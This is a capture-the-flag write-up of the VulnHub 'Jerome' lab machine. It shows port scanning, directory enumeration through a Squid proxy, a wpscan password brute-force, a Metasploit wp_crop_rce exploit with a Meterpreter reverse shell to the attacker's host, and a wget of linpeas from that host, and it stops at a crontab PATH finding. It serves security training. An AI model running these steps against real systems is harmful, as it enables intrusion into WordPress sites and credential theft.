Jerome
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:fe:db:5e 1 60 PCS Systemtechnik GmbH
192.168.56.219 08:00:27:7f:57:f4 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host's IP address was identified as 192.168.56.219.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-30 22:38 EST
Nmap scan report for 192.168.56.219
Host is up (0.000072s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27
MAC Address: 08:00:27:7F:57:F4 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds
The Nmap scan shows that the target host has a single open port, 8080 (HTTP), running a Squid proxy service.
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://192.168.56.219:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 3592 -b 400
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 400
[+] Exclude Length: 3592
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/30 22:43:58 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220324 / 220561 (99.89%)===============================================================
2022/12/30 22:47:22 Finished
===============================================================
It looks like the target's port 8080 has to be used as an HTTP proxy. Requesting http://127.0.0.1 through it returns a blank page, but the source contains a comment:
<!- Move along -->
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.219:8080
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/30 22:53:32 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 200) [Size: 7775]
Progress: 218971 / 220561 (99.28%)===============================================================
2022/12/30 22:54:20 Finished
=============================================================
The /server-status page was found:
Apache Server Status for 127.0.0.1 (via 127.0.0.1)
Server Version: Apache/2.4.29 (Ubuntu)
Server MPM: prefork
Server Built: 2018-10-10T18:59:25
Current Time: Saturday, 31-Dec-2022 04:56:59 CET
Restart Time: Saturday, 31-Dec-2022 04:21:17 CET
Parent Server Config. Generation: 1
Parent Server MPM Generation: 0
Server uptime: 35 minutes 42 seconds
Server load: 0.98 0.54 0.23
Total accesses: 795722 - Total Traffic: 541.3 MB
CPU Usage: u28.69 s21.97 cu0 cs0 - 2.37% CPU load
371 requests/sec - 258.8 kB/second - 713 B/request
10 requests currently being processed, 5 idle workers
KWKKK__KKK_K..._K._.............................................
................................................................
......................
Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Srv PID Acc M CPU SS Req Conn Child Slot Client Protocol VHost Request
0-0 613 62/51818/51818 K 3.53 0 0 43.5 35.25 35.25 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditechFP.txt HTTP/1.1
1-0 614 4/52040/52040 W 3.53 0 0 2.8 35.41 35.41 127.0.0.1 http/1.1 127.0.1.1:80 GET /server-status HTTP/1.1
2-0 992 77/38457/52167 K 2.69 0 0 54.0 26.21 35.50 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.html HTTP/1.1
3-0 993 44/38020/51573 K 2.66 0 0 30.8 25.91 35.09 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditechFP.html HTTP/1.1
4-0 994 97/38376/51921 K 2.69 0 0 68.1 26.16 35.33 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.php HTTP/1.1
5-0 963 0/52228/52228 _ 3.55 0 0 0.0 35.53 35.53 127.0.0.1 http/1.1 127.0.1.1:80 GET /200602byauthor HTTP/1.1
6-0 977 0/51752/51752 _ 3.51 0 0 0.0 35.20 35.20 127.0.0.1 http/1.1 127.0.1.1:80 GET /004076.js HTTP/1.1
7-0 995 31/37502/38513 K 2.64 0 0 21.8 25.56 26.25 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditech.php HTTP/1.1
8-0 996 4/36869/49899 K 2.60 0 0 2.8 25.14 33.96 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.js HTTP/1.1
9-0 980 81/50597/50597 K 3.47 0 0 56.7 34.43 34.43 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.txt HTTP/1.1
10-0 981 0/50967/50967 _ 3.49 0 0 0.0 34.68 34.68 127.0.0.1 http/1.1 127.0.1.1:80 GET /comment-post.txt HTTP/1.1
11-0 982 8/51049/51049 K 3.48 0 0 5.6 34.74 34.74 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.sh HTTP/1.1
12-0 - 0/0/12323 . 0.78 154 0 0.0 0.00 8.34 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
13-0 - 0/0/12020 . 0.74 149 0 0.0 0.00 8.14 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
14-0 - 0/0/910 . 0.05 201 0 0.0 0.00 0.61 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
15-0 986 0/50290/50290 _ 3.43 0 0 0.0 34.22 34.22 127.0.0.1 http/1.1 127.0.1.1:80 GET /movingcompanies.html HTTP/1.1
16-0 987 64/50761/50761 K 3.49 0 0 45.0 34.54 34.54 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditechFP.sh HTTP/1.1
17-0 - 0/0/12020 . 0.75 152 0 0.0 0.00 8.14 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
18-0 989 0/50751/50751 _ 3.47 0 0 0.0 34.54 34.54 127.0.0.1 http/1.1 127.0.1.1:80 GET /32676.sh HTTP/1.1
19-0 - 0/0/1718 . 0.10 198 0 0.0 0.00 1.16 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
20-0 - 0/0/405 . 0.01 203 0 0.0 0.00 0.27 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
The server-status output reveals that 127.0.0.1 also has a service listening on port 1337.
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080 -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.219:8080
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2022/12/30 23:00:25 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 290]
/.html (Status: 403) [Size: 291]
/index.html (Status: 200) [Size: 0]
/wordpress (Status: 301) [Size: 317] [--> http://127.0.0.1:1337/wordpress/]
Progress: 8355 / 1323366 (0.63%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/30 23:00:28 Finished
===============================================================
Gobuster found a wordpress directory on port 1337.
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:02:16 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: MISS from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] root
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jerome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 23:02:19 2022
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 16.059 KB
[+] Data Received: 143.36 KB
[+] Memory used: 224.133 MB
[+] Elapsed time: 00:00:02
wpscan identified two usernames, root and jerome. Let's see whether their passwords can be cracked:
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U root -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:03:22 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: MISS from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
^Cying root / sayyes Time: 00:17:23 < > (145935 / 14344392) 1.01% ETA: 28:12:23
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.> (145940 / 14344392) 1.01% ETA: 28:12:30
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 23:20:49 2022
[+] Requests Done: 146086
[+] Cached Requests: 29
[+] Data Sent: 57.559 MB
[+] Data Received: 608.27 MB
[+] Memory used: 266.812 MB
[+] Elapsed time: 00:17:27
Scan Aborted: Canceled by User
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U jerome -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:21:03 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: HIT from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - jerome / jerome
Trying jerome / jerome Time: 00:00:02 < > (420 / 14344812) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerome, Password: jerome
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 23:21:10 2022
[+] Requests Done: 586
[+] Cached Requests: 4
[+] Data Sent: 224.011 KB
[+] Data Received: 1.85 MB
[+] Memory used: 264.891 MB
[+] Elapsed time: 00:00:06
Only jerome's password was cracked; root's was not.
Logging in as jerome shows that this user is not an administrator. Following other people's writeups, a Metasploit module was used to obtain a shell:
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.219:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS localhost yes The target host(s), see https://github.com/rapid7/metasploit-framework/w
iki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) > set Proxies http:192.168.56.219:8080
Proxies => http:192.168.56.219:8080
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:5555
[-] http: The proxy returned a non-OK response
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[-] The host (192.168.56.219:8080) was unreachable.
[-] Exploit aborted due to failure: not-found: Failed to access Wordpress page to retrieve theme.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http:192.168.56.219:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS localhost yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http:192.168.56.219:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) >
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 192.168.56.219
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.219:42732) at 2022-12-30 23:43:58 -0500
shell[*] Attempting to clean up files...
meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)
Note in particular that the Proxies option must be set in the format given by the option description, http:192.168.56.219:8080, not as a URL such as http://192.168.56.219:8080.
RHOSTS must also be 127.0.0.1; otherwise the exploit fails.
meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)
which python
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
jerome@jerome:/var/www/html/wordpress$ ls
ls
KwBppbQNVC.php wp-activate.php wp-content wp-mail.php
SPBLmthcHr.php wp-admin wp-cron.php wp-settings.php
WpnKElxqGj.php wp-blog-header.php wp-includes wp-signup.php
index.php wp-comments-post.php wp-links-opml.php wp-trackback.php
license.txt wp-config-sample.php wp-load.php xmlrpc.php
readme.html wp-config.php wp-login.php
jerome@jerome:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'jerome');
/** MySQL database password */
define('DB_PASSWORD', 'jerome');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');
define('WP_AUTO_UPDATE_CORE', false);
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
jerome@jerome:/var/www/html/wordpress$ cd /home
cd /home
jerome@jerome:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Apr 16 2019 .
drwxr-xr-x 22 root root 4.0K Mar 31 2019 ..
drwxr-xr-x 4 jerome jerome 4.0K Apr 20 2019 jerome
jerome@jerome:/home$ cd jerome
cd jerome
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 jerome jerome 4.0K Apr 20 2019 .
drwxr-xr-x 3 root root 4.0K Apr 16 2019 ..
-rw-r--r-- 1 jerome jerome 220 Apr 16 2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16 2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16 2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16 2019 .local
-rw-r--r-- 1 jerome jerome 807 Apr 16 2019 .profile
-rw-r--r-- 1 jerome jerome 0 Apr 16 2019 .sudo_as_admin_successful
-rw-r--r-- 1 1001 1001 12 Apr 12 2019 flag.txt
jerome@jerome:/home/jerome$ cat flag.txt
cat flag.txt
b0ed001c825
jerome@jerome:/home/jerome$ sudo -l
sudo -l
[sudo] password for jerome: jerome
Sorry, try again.
[sudo] password for jerome: jerome
Sorry, try again.
[sudo] password for jerome: jerome
sudo: 3 incorrect password attempts
jerome@jerome:/home/jerome$
Privilege escalation
Upload the linpeas.sh script to the target's /tmp directory, make it executable, and run it:
jerome@jerome:/home/jerome$ cd /tmp
cd /tmp
jerome@jerome:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-31 05:47:53-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.002s
2022-12-31 05:47:53 (306 MB/s) - 'linpeas.sh' saved [765823/765823]
jerome@jerome:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
jerome@jerome:/tmp$ ./linpeas.sh
One part of the output stood out:
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
But nothing came of it.
jerome@jerome:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot root /bin/bash /usr/share/simulate.sh
@reboot root dhclient
jerome@jerome:/tmp$
jerome@jerome:/tmp$ cat /usr/share/simulate.sh
cat /usr/share/simulate.sh
#
# This script simulates human behaviour from the root account
#
while true
do
cd /home/jerome;
ls;
sleep 120;
done
